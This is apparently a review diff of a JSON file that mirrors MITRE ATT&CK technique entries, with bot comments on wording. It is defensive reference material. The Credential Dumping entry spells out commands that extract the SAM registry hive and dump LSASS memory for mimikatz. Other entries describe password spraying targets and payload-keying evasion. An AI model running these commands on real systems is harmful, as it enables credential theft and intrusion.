Credentials can then be used to perform Lateral Movement and access restricted information.\n\nSeveral of the tools mentioned in this technique may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.\n\n### Windows\n\n#### SAM (Security Accounts Manager)\n\nThe SAM is a database file that contains local accounts for the host, typically those found with the ‘net user’ command. To enumerate the SAM database, system level access is required.\n \nA number of tools can be used to retrieve the SAM file through in-memory techniques:\n\n* pwdumpx.exe \n* [gsecdump](https://attack.mitre.org/software/S0008)\n* [Mimikatz](https://attack.mitre.org/software/S0002)\n* secretsdump.py\n\nAlternatively, the SAM can be extracted from the Registry with [Reg](https://attack.mitre.org/software/S0075):\n\n* reg save HKLM\\sam sam\n* reg save HKLM\\system system\n\nCreddump7 can then be used to process the SAM database locally to retrieve hashes. (Citation: GitHub Creddump7)\n\nNotes:\nRid 500 account is the local, in-built administrator.\nRid 501 is the guest account.\nUser accounts start with a RID of 1,000+.\n\n#### Cached Credentials\n\nThe DCC2 (Domain Cached Credentials version 2) hash, used by Windows Vista and newer caches credentials when the domain controller is unavailable. The number of default cached credentials varies, and this number can be altered per system. 
This hash does not allow pass-the-hash style attacks.\n \nA number of tools can be used to retrieve the SAM file through in-memory techniques.\n\n* pwdumpx.exe \n* [gsecdump](https://attack.mitre.org/software/S0008)\n* [Mimikatz](https://attack.mitre.org/software/S0002)\n\nAlternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials.\n\nNotes:\nCached credentials for Windows Vista are derived using PBKDF2.\n\n#### Local Security Authority (LSA) Secrets\n\nWith SYSTEM access to a host, the LSA secrets often allows trivial access from a local account to domain-based account credentials. The Registry is used to store the LSA secrets.\n \nWhen services are run under the context of local or domain users, their passwords are stored in the Registry. If auto-logon is enabled, this information will be stored in the Registry as well.\n \nA number of tools can be used to retrieve the SAM file through in-memory techniques.\n\n* pwdumpx.exe \n* [gsecdump](https://attack.mitre.org/software/S0008)\n* [Mimikatz](https://attack.mitre.org/software/S0002)\n* secretsdump.py\n\nAlternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials.\n\nNotes:\nThe passwords extracted by his mechanism are UTF-16 encoded, which means that they are returned in plaintext.\nWindows 10 adds protections for LSA Secrets described in Mitigation.\n\n#### NTDS from Domain Controller\n\nActive Directory stores information about members of the domain including devices and users to verify credentials and define access rights. The Active Directory domain database is stored in the NTDS.dit file. By default the NTDS file will be located in %SystemRoot%\\NTDS\\Ntds.dit of a domain controller. 
(Citation: Wikipedia Active Directory)\n \nThe following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.\n\n* Volume Shadow Copy\n* secretsdump.py\n* Using the in-built Windows tool, ntdsutil.exe\n* Invoke-NinjaCopy\n\n#### Group Policy Preference (GPP) Files\n\nGroup Policy Preferences (GPP) are tools that allowed administrators to create domain policies with embedded credentials. These policies, amongst other things, allow administrators to set local accounts.\n\nThese group policies are stored in SYSVOL on a domain controller, this means that any domain user can view the SYSVOL share and decrypt the password (the AES private key was leaked on-line. (Citation: Microsoft GPP Key) (Citation: SRD GPP)\n\nThe following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:\n\n* Metasploit’s post exploitation module: \"post/windows/gather/credentials/gpp\"\n* Get-GPPPassword (Citation: Obscuresecurity Get-GPPPassword)\n* gpprefdecrypt.py\n\nNotes:\nOn the SYSVOL share, the following can be used to enumerate potential XML files.\ndir /s * .xml\n\n#### Service Principal Names (SPNs)\n\nSee [Kerberoasting](https://attack.mitre.org/techniques/T1208).\n\n#### Plaintext Credentials\n\nAfter a user logs on to a system, a variety of credentials are generated and stored in the Local Security Authority Subsystem Service (LSASS) process in memory. 
These credentials can be harvested by a administrative user or SYSTEM.\n\nSSPI (Security Support Provider Interface) functions as a common interface to several Security Support Providers (SSPs): A Security Support Provider is a dynamic-link library (DLL) that makes one or more security packages available to applications.\n\nThe following SSPs can be used to access credentials:\n\nMsv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.\nWdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges. (Citation: TechNet Blogs Credential Protection)\nKerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.\nCredSSP:  Provides SSO and Network Level Authentication for Remote Desktop Services. (Citation: Microsoft CredSSP)\n \nThe following tools can be used to enumerate credentials:\n\n* [Windows Credential Editor](https://attack.mitre.org/software/S0005)\n* [Mimikatz](https://attack.mitre.org/software/S0002)\n\nAs well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.\n\nFor example, on the target host use procdump:\n\n* procdump -ma lsass.exe lsass_dump\n\nLocally, mimikatz can be run:\n\n* sekurlsa::Minidump lsassdump.dmp\n* sekurlsa::logonPasswords\n\n#### DCSync\n\nDCSync is a variation on credential dumping which can be used to acquire sensitive information from a domain controller. Rather than executing recognizable malicious code, the action works by abusing the domain controller's application programming interface (API) (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller. 
Any members of the Administrators, Domain Admins, Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data (Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a Golden Ticket for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1097) (Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098). (Citation: InsiderThreat ChangeNTLM July 2017) DCSync functionality has been included in the \"lsadump\" module in Mimikatz. (Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol. (Citation: Microsoft NRPC Dec 2017)\n\n### Linux\n\n#### Proc filesystem\n\nThe /proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively. This functionality has been implemented in the [MimiPenguin](https://attack.mitre.org/software/S0179), an open source tool inspired by [Mimikatz](https://attack.mitre.org/software/S0002). The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.", "meta": { "external_id": "CAPEC-567", "kill_chain": [ 
@@ -7283,31 +7712,31 @@
 "refs": [
 "https://attack.mitre.org/techniques/T1003",
 "https://capec.mitre.org/data/definitions/567.html",
- "https://github.com/mattifestation/PowerSploit",
- "http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/",
- "https://adsecurity.org/?p=1729",
- "https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump",
- "https://msdn.microsoft.com/library/cc228086.aspx",
- "https://msdn.microsoft.com/library/dd207691.aspx",
- "https://wiki.samba.org/index.php/DRSUAPI",
- "https://source.winehq.org/WineAPI/samlib.html",
- "https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM",
- "https://msdn.microsoft.com/library/cc245496.aspx",
- "https://msdn.microsoft.com/library/cc237008.aspx",
 "https://github.com/Neohapsis/creddump7",
 "https://en.wikipedia.org/wiki/Active_Directory",
 "https://msdn.microsoft.com/library/cc422924.aspx",
 "http://blogs.technet.com/b/srd/archive/2014/05/13/ms14-025-an-update-for-group-policy-preferences.aspx",
+ "https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html",
 "https://blogs.technet.microsoft.com/askpfeplat/2016/04/18/the-importance-of-kb2871997-and-kb2928120-for-credential-protection/",
 "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-vista/cc749211(v=ws.10)",
- "https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html"
+ "https://msdn.microsoft.com/library/cc228086.aspx",
+ "https://msdn.microsoft.com/library/dd207691.aspx",
+ "https://wiki.samba.org/index.php/DRSUAPI",
+ "https://source.winehq.org/WineAPI/samlib.html",
+ "https://adsecurity.org/?p=1729",
+ "http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/",
+ "https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM",
+ "https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump",
+ "https://msdn.microsoft.com/library/cc237008.aspx",
+ "https://github.com/mattifestation/PowerSploit",
+ "https://msdn.microsoft.com/library/cc245496.aspx"
 ]
 },
 "uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22",
 "value": "Credential Dumping - T1003"
 },
 {
- "description": "Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n\nData captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning](https://attack.mitre.org/techniques/T1171), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.\n\nNetwork sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (ex: IP addressing, hostnames, VLAN IDs) necessary for follow-on Lateral Movement and/or Defense Evasion activities.",
+ "description": "Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n\nData captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and Relay](https://attack.mitre.org/techniques/T1171), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.\n\nNetwork sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (ex: IP addressing, hostnames, VLAN IDs) necessary for follow-on Lateral Movement and/or Defense Evasion activities.",
 "meta": {
 "external_id": "CAPEC-158",
 "kill_chain": [
@@ -7442,7 +7871,7 @@
 "value": "Connection Proxy - T1090"
 },
 {
- "description": "Adversaries may use brute force techniques to attempt access to accounts when passwords are unknown or when password hashes are obtained.\n\n[Credential Dumping](https://attack.mitre.org/techniques/T1003) to obtain password hashes may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1075) is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table. Cracking hashes is usually done on adversary-controlled systems outside of the target network. (Citation: Wikipedia Password cracking)\n\nAdversaries may attempt to brute force logins without knowledge of passwords or hashes during an operation either with zero knowledge or by attempting a list of known or possible passwords. This is a riskier option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver)\n\nA related technique called password spraying uses one password, or a small list of passwords, that matches the complexity policy of the domain and may be a commonly used password. Logins are attempted with that password and many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)",
+ "description": "Adversaries may use brute force techniques to attempt access to accounts when passwords are unknown or when password hashes are obtained.\n\n[Credential Dumping](https://attack.mitre.org/techniques/T1003) is used to obtain password hashes, this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1075) is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network. (Citation: Wikipedia Password cracking)\n\nAdversaries may attempt to brute force logins without knowledge of passwords or hashes during an operation either with zero knowledge or by attempting a list of known or possible passwords. This is a riskier option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver)\n\nA related technique called password spraying uses one password (e.g. 'Password01'), or a small list of passwords, that matches the complexity policy of the domain and may be a commonly used password. Logins are attempted with that password and many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)\n\nTypically, management services over commonly used ports are used when password spraying. Commonly targeted services include the following:\n\n* SSH (22/TCP)\n* Telnet (23/TCP)\n* FTP (21/TCP)\n* NetBIOS / SMB / Samba (139/TCP & 445/TCP)\n* LDAP (389/TCP)\n* Kerberos (88/TCP)\n* RDP / Terminal Services (3389/TCP)\n* HTTP/HTTP Management Services (80/TCP & 443/TCP)\n* MSSQL (1433/TCP)\n* Oracle (1521/TCP)\n* MySQL (3306/TCP)\n* VNC (5900/TCP)\n\n\nIn default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows \"logon failure\" event ID 4625.",
 "meta": {
 "external_id": "T1110",
 "kill_chain": [
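Review bot: The closing sentence of the new description, `In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows \"logon failure\" event ID 4625.`, is the only claim in the text without a `(Citation: ...)` marker, and as written it reads as if spraying over LDAP or Kerberos leaves no trace at all. Presumably the Trimarc detection link added to `refs` in the next hunk is its source — confirm — and a citation marker after the sentence would make that traceable to the entry. From a detection standpoint the sentence would be more useful if it also said what those paths do produce: a failed Kerberos pre-authentication is logged on the domain controller as event ID 4771 when Kerberos authentication service auditing is enabled. The list entry `HTTP/HTTP Management Services (80/TCP & 443/TCP)` also mislabels 443, which is HTTPS.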
@@ -7460,7 +7889,8 @@
 "https://attack.mitre.org/techniques/T1110",
 "https://en.wikipedia.org/wiki/Password_cracking",
 "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf",
- "http://www.blackhillsinfosec.com/?p=4645"
+ "http://www.blackhillsinfosec.com/?p=4645",
+ "https://www.trimarcsecurity.com/single-post/2018/05/06/Trimarc-Research-Detecting-Password-Spraying-with-Security-Event-Auditing"
 ]
 },
 "uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd",
@@ -7568,7 +7998,7 @@
 "value": "AppInit DLLs - T1103"
 },
 {
- "description": "A port monitor can be set through the (Citation: AddMonitor) API call to set a DLL to be loaded at startup. (Citation: AddMonitor) This DLL can be located in C:\\Windows\\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors. The Registry key contains entries for the following:\n* Local Port\n* Standard TCP/IP Port\n* USB Monitor\n* WSD Port\n\nAdversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.",
+ "description": "A port monitor can be set through the (Citation: AddMonitor) API call to set a DLL to be loaded at startup. (Citation: AddMonitor) This DLL can be located in C:\\Windows\\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors. \n\nThe Registry key contains entries for the following:\n\n* Local Port\n* Standard TCP/IP Port\n* USB Monitor\n* WSD Port\n\nAdversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.",
 "meta": {
 "external_id": "T1013",
 "kill_chain": [
@@ -7623,7 +8053,7 @@
 "value": "Accessibility Features - T1015"
 },
 {
- "description": "Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UT-8 encoded and formatted like XML documents via a series of keys surrounded by < >. They detail when programs should execute, file paths to the executables, program arguments, required OS permissions, and many others. plists are located in certain locations depending on their purpose such as /Library/Preferences (which execute with elevated privileges) and ~/Library/Preferences (which execute with a user's privileges). \nAdversaries can modify these plist files to point to their own code, can use them to execute their code in the context of another user, bypass whitelisting procedures, or even use them as a persistence mechanism. (Citation: Sofacy Komplex Trojan)",
+ "description": "Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UTF-8 encoded and formatted like XML documents via a series of keys surrounded by < >. They detail when programs should execute, file paths to the executables, program arguments, required OS permissions, and many others. plists are located in certain locations depending on their purpose such as /Library/Preferences (which execute with elevated privileges) and ~/Library/Preferences (which execute with a user's privileges). \nAdversaries can modify these plist files to point to their own code, can use them to execute their code in the context of another user, bypass whitelisting procedures, or even use them as a persistence mechanism. (Citation: Sofacy Komplex Trojan)",
 "meta": {
 "external_id": "T1150",
 "kill_chain": [
@@ -7647,6 +8077,35 @@
 "uuid": "06780952-177c-4247-b978-79c357fb311f",
 "value": "Plist Modification - T1150"
 },
+ {
+ "description": "Systemd services can be used to establish persistence on a Linux system. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014)(Citation: Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems.\n\nSystemd utilizes configuration files known as service units to control how services boot and under what conditions. By default, these unit files are stored in the /etc/systemd/system and /usr/lib/systemd/system directories and have the file extension .service. Each service unit file may contain numerous directives that can execute system commands. \n\n* ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands when a services is started manually by 'systemctl' or on system start if the service is set to automatically start. \n* ExecReload directive covers when a service restarts. \n* ExecStop and ExecStopPost directives cover when a service is stopped or manually by 'systemctl'.\n\nAdversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at recurring intervals, such as at system boot.(Citation: Anomali Rocke March 2019)(Citation: gist Arch package compromise 10JUL2018)(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018)\n\nWhile adversaries typically require root privileges to create/modify service unit files in the /etc/systemd/system and /usr/lib/systemd/system directories, low privilege users can create/modify service unit files in directories such as ~/.config/systemd/user/ to achieve user-level persistence.(Citation: Rapid7 Service Persistence 22JUNE2016)",
+ "meta": {
+ "external_id": "T1501",
+ "kill_chain": [
+ "mitre-attack:persistence"
+ ],
+ "mitre_data_sources": [
+ "Process command-line parameters",
+ "Process monitoring",
+ "File monitoring"
+ ],
+ "mitre_platforms": [
+ "Linux"
+ ],
+ "refs": [
+ "https://attack.mitre.org/techniques/T1501",
+ "http://man7.org/linux/man-pages/man1/systemd.1.html",
+ "https://www.freedesktop.org/wiki/Software/systemd/",
+ "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
+ "https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a",
+ "https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/",
+ "https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html",
+ "https://www.rapid7.com/db/modules/exploit/linux/local/service_persistence"
+ ]
+ },
+ "uuid": "0fff2797-19cb-41ea-a5f1-8a9303b8158e",
+ "value": "Systemd Service - T1501"
+ },
 {
 "description": "Adversaries may add malicious content to an internally accessible website through an open network file share that contains the website's webroot or Web content directory (Citation: Microsoft Web Root OCT 2016) (Citation: Apache Server 2018) and then browse to that content with a Web browser to cause the server to execute the malicious content. The malicious content will typically run under the context and permissions of the Web server process, often resulting in local system or administrative privileges, depending on how the Web server is configured.\n\nThis mechanism of shared access and remote execution could be used for lateral movement to the system running the Web server. For example, a Web server running PHP with an open network share could allow an adversary to upload a remote access tool and PHP script to execute the RAT on the system running the Web server when a specific page is visited. (Citation: Webroot PHP 2011)",
 "meta": {
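Review bot: Two items in the new Systemd Service description's directive list are garbled: `* ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands when a services is started manually by 'systemctl'` should read `when a service is started`, and `* ExecStop and ExecStopPost directives cover when a service is stopped or manually by 'systemctl'.` has lost its object — something like `cover commands run when a service is stopped, whether by the system or manually via 'systemctl'.` reads correctly. Since the text appears to be mirrored from the upstream ATT&CK entry for T1501, the wording fix presumably belongs there rather than in this cluster file — confirm before editing here. The three unit-file locations the description names (`/etc/systemd/system`, `/usr/lib/systemd/system`, `~/.config/systemd/user/`) are what the listed `File monitoring` data source has to cover, so they are worth keeping explicit in the text.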
@@ -8330,6 +8789,36 @@
 "uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e",
 "value": "Data Staged - T1074"
 },
+ {
+ "description": "Execution guardrails constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. \n\nGuardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.\n\nEnvironmental keying is one type of guardrail that includes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents) Values can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation: Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware) By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper)(Citation: Ebowla: Genetic Malware) These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).\n\nSimilar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use guardrails and environmental keying to help protect their TTPs and evade detection. For example, environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) In general, guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) where a decision can be made not to further engage because the value conditions specified by the adversary are meant to be target specific and not such that they could occur in any environment.",
+ "meta": {
+ "external_id": "T1480",
+ "kill_chain": [
+ "mitre-attack:defense-evasion"
+ ],
+ "mitre_data_sources": [
+ "Process monitoring"
+ ],
+ "mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ],
+ "refs": [
+ "https://attack.mitre.org/techniques/T1480",
+ "https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/",
+ "https://www.schneier.com/academic/paperfiles/paper-clueless-agents.pdf",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134940/kaspersky-lab-gauss.pdf",
+ "https://www.proofpoint.com/us/threat-insight/post/home-routers-under-attack-malvertising-windows-android-devices",
+ "https://pdfs.semanticscholar.org/2721/3d206bc3c1e8c229fb4820b6af09e7f975da.pdf",
+ "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/smuggling-hta-files-in-internet-exploreredge/",
+ "https://github.com/Genetic-Malware/Ebowla/blob/master/Eko_2016_Morrow_Pitts_Master.pdf",
+ "https://github.com/nccgroup/demiguise/blob/master/examples/virginkey.js"
+ ]
+ },
+ "uuid": "853c4192-4311-43e1-bfbb-b11b14911852",
+ "value": "Execution Guardrails - T1480"
+ },
 {
 "description": "Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.\n\n### Windows\n\nThere are multiple approaches to injecting code into a live process. Windows implementations include: (Citation: Endgame Process Injection July 2017)\n\n* **Dynamic-link library (DLL) injection** involves writing the path to a malicious DLL inside a process then invoking execution by creating a remote thread.\n* **Portable executable injection** involves writing malicious code directly into the process (without a file on disk) then invoking execution with either additional code or by creating a remote thread. The displacement of the injected code introduces the additional requirement for functionality to remap memory references. Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue. (Citation: Endgame HuntingNMemory June 2017)\n* **Thread execution hijacking** involves injecting malicious code or the path to a DLL into a thread of a process. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1093), the thread must first be suspended.\n* **Asynchronous Procedure Call** (APC) injection involves attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process's thread. Queued APC functions are executed when the thread enters an alterable state. A variation of APC injection, dubbed \"Early Bird injection\", involves creating a suspended process in which malicious code can be written and executed before the process' entry point (and potentially subsequent anti-malware hooks) via an APC. (Citation: CyberBit Early Bird Apr 2018) AtomBombing (Citation: ENSIL AtomBombing Oct 2016) is another variation that utilizes APCs to invoke malicious code previously written to the global atom table. (Citation: Microsoft Atom Table)\n* **Thread Local Storage** (TLS) callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point. (Citation: FireEye TLS Nov 2017)\n\n### Mac and Linux\n\nImplementations for Linux and OS X/macOS systems include: (Citation: Datawire Code Injection) (Citation: Uninformed Needle)\n\n* **LD_PRELOAD, LD_LIBRARY_PATH** (Linux), **DYLD_INSERT_LIBRARIES** (Mac OS X) environment variables, or the dlfcn application programming interface (API) can be used to dynamically load a library (shared object) in a process which can be used to intercept API calls from the running process. (Citation: Phrack halfdead 1997)\n* **Ptrace system calls** can be used to attach to a running process and modify it in runtime. (Citation: Uninformed Needle)\n* **/proc/[pid]/mem** provides access to the memory of the process and can be used to read/write arbitrary data to it. This technique is very rare due to its complexity. (Citation: Uninformed Needle)\n* **VDSO hijacking** performs runtime injection on ELF binaries by manipulating code stubs mapped in from the linux-vdso.so shared object. (Citation: VDSO hijack 2009)\n\nMalware commonly utilizes process injection to access system resources through which Persistence and other environment modifications can be made. More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel.",
 "meta": {
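Review bot: The second paragraph of the new Execution Guardrails description has a number-agreement slip, `Guardrails ensure that a payload only executes against an intended target and reduces collateral damage` — `reduce` agrees with `Guardrails` — and the opening sentence's `adversary supplied environment specific conditions` wants hyphens (`adversary-supplied, environment-specific conditions`). As with the other new entries in this commit the text appears to be mirrored from the upstream ATT&CK entry for T1480, so the wording fix presumably belongs there — confirm before editing the cluster file directly.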
@@ -8455,7 +8944,7 @@ "value": "Account Discovery - T1087" }, { - "description": "Adversaries may steal the credentials of a specific user or service account using Credential Access techniques or capture credentials earlier in their reconnaissance process through social engineering for means of gaining Initial Access. \n\nCompromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.\n\nAdversaries may also create accounts, sometimes using pre-defined account names and passwords, as a means for persistence through backup access in case other means are unsuccessful. \n\nThe overlap of credentials and permissions across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft)", + "description": "Adversaries may steal the credentials of a specific user or service account using Credential Access techniques or capture credentials earlier in their reconnaissance process through social engineering for means of gaining Initial Access. \n\nAccounts that an adversary may use can fall into three categories: default, local, and domain accounts. Default accounts are those that are built-into an OS such as Guest or Administrator account on Windows systems or default factory/provider set accounts on other types of systems, software, or devices. 
Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. (Citation: Microsoft Local Accounts Feb 2019) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.\n\nCompromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.\n\nDefault accounts are also not limited to Guest and Administrator on client machines, they also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or COTS. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed private keys, or stolen private keys, to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021) (Citation: Metasploit SSH Module)\n\nThe overlap of account access, credentials, and permissions across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. 
(Citation: TechNet Credential Theft)", "meta": { "external_id": "CAPEC-560", "kill_chain": [ @@ -8476,6 +8965,8 @@ "refs": [ "https://attack.mitre.org/techniques/T1078", "https://capec.mitre.org/data/definitions/560.html", + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts", + "https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/linux/ssh", "https://technet.microsoft.com/en-us/library/dn535501.aspx", "https://technet.microsoft.com/en-us/library/dn487457.aspx" ] 
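Review bot: The rewritten Valid Accounts description keeps two wording defects in the new `+ "description"` line (which begins on the hunk's earlier lines): `built-into an OS` should read `built into an OS`, and the sentence ending `via [Remote Services](https://attack.mitre.org/techniques/T1021) (Citation: Metasploit SSH Module)` has no terminating period before the `\n\n` paragraph break, unlike every other sentence in the field. Since the whole string is being replaced anyway, both can be fixed in the same line without touching any other entry.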
